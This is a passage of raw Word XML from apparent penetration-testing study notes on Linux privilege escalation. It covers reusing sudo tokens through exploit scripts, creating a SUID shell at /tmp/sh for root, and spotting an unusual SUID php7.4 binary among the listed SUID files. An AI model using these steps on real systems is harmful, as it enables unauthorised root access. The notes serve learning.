    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it asks for password and you don't know it, then press "CTRL + C"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002048">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then look for processes that have Sudo token and have our UID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002049">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps -e -o pid,uid,cmd | grep $(id -u) | grep sudo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000204A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Automatically search for any sudo processes with your UID</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000204B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps -e -o pid,uid,cmd | grep $(id -u)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000204C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Looks for all processes with our UID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000204D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look for any processes that have SUDO in it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000204E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you find any sudo processes with your UID, then run either exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000204F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./exploit.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002050">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This should make it so that you can run "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -i</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" without password and get root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002051">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./exploit_v2.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002052">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Creates SUID sh in /tmp/sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002053">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/sh -p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" to get root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002054">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020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56">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002057">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gfldleadglq1" w:id="282"/>
      <w:bookmarkEnd w:id="282"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002058">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002059">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000205A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4992405" cy="4481513"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="388" name="image404.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image404.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId700"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4992405" cy="4481513"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000205B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000205C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Most of these are normal. Over time, you will start to memorize them. All of them are normal besides</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/bin/php7.4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000205D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/snap/core20/1611/usr/bin/gpasswd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000205E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/snap/core20/1611/usr/bin/mount</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000205F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/snap/core20/1611/usr/bin/newgrp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002060">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/snap/core20/1611/usr/bin/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002061">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/snap/core20/1611/usr/bin/su</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002062">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/snap/core20/1611/usr/bin/sudo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002063">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/snap/core20/1611/usr/bin/umount</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002064">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/snap/core20/1611/usr/lib/dbus-1.0/dbus-daemon-launch-helper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002065">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/snap/core20/1611/usr/lib/openssh/ssh-keysign</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002066">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/snap/snapd/18596/usr/lib/snapd/snap-confine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002067">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/lib/dbus-1.0/dbus-daemon-launch-helper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002068">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/lib/eject/dmcrypt-get-device</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002069">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/lib/snapd/snap-confine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000206A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/lib/openssh/ssh-keysign</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000206B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/lib/policykit-1/polkit-agent-helper-1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000206C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/chsh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000206D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/at</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000206E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/su</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000206F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/fusermount</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002070">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/chfn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002071">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/umount</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002072">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/sudo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002073">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002074">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/newgrp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002075">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/mount</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002076">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
